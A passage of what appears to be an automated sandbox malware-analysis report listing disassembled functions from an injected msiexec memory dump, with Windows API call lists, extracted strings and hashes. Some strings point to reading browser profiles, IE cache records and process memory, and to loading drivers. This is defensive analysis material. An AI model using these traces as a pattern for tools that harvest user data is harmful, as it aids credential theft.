                                                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                            • GetDC.USER32 ref: 004140E3
                                                                            • wcslen.MSVCRT ref: 00414123
                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                            • String ID: %s:$EDIT$STATIC
                                                                            • API String ID: 2080319088-3046471546
                                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                            APIs
                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                            • memset.MSVCRT ref: 00413292
                                                                            • memset.MSVCRT ref: 004132B4
                                                                            • memset.MSVCRT ref: 004132CD
                                                                            • memset.MSVCRT ref: 004132E1
                                                                            • memset.MSVCRT ref: 004132FB
                                                                            • memset.MSVCRT ref: 00413310
                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                            • memset.MSVCRT ref: 004133C0
                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                            Strings
                                                                            • {Unknown}, xrefs: 004132A6
                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                            • API String ID: 4111938811-1819279800
                                                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                            • String ID:
                                                                            • API String ID: 829165378-0
                                                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                            • memset.MSVCRT ref: 00404200
                                                                            • memset.MSVCRT ref: 00404215
                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 0040426E
                                                                            • memset.MSVCRT ref: 004042CD
                                                                            • memset.MSVCRT ref: 004042E2
                                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                                            • wcscpy.MSVCRT ref: 00404311
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                            • API String ID: 2454223109-1580313836
                                                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                            APIs
                                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                            • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                            • API String ID: 4054529287-3175352466
                                                                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                            • API String ID: 3143752011-1996832678
                                                                            • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                            • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                            • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                            • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                            • API String ID: 667068680-2887671607
                                                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                            • API String ID: 1607361635-601624466
                                                                            • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                            • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                            • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                            • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                            • API String ID: 2000436516-3842416460
                                                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                            APIs
                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                            • String ID:
                                                                            • API String ID: 1043902810-0
                                                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                            APIs
                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                            • free.MSVCRT ref: 0040E49A
                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                            • memset.MSVCRT ref: 0040E380
                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                            • API String ID: 3849927982-2252543386
                                                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                            • _snwprintf.MSVCRT ref: 0044488A
                                                                            • wcscpy.MSVCRT ref: 004448B4
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                            • API String ID: 2899246560-1542517562
                                                                            • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                            • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040DBCD
                                                                            • memset.MSVCRT ref: 0040DBE9
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                            • wcscpy.MSVCRT ref: 0040DC2D
                                                                            • wcscpy.MSVCRT ref: 0040DC3C
                                                                            • wcscpy.MSVCRT ref: 0040DC4C
                                                                            • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                            • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                            • wcscpy.MSVCRT ref: 0040DCC3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                            • API String ID: 3330709923-517860148
                                                                            • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                            • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                            • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                            • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                            APIs
                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                            • memset.MSVCRT ref: 0040806A
                                                                            • memset.MSVCRT ref: 0040807F
                                                                            • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                            • _wcsicmp.MSVCRT ref: 004081C3
                                                                            • memset.MSVCRT ref: 004081E4
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
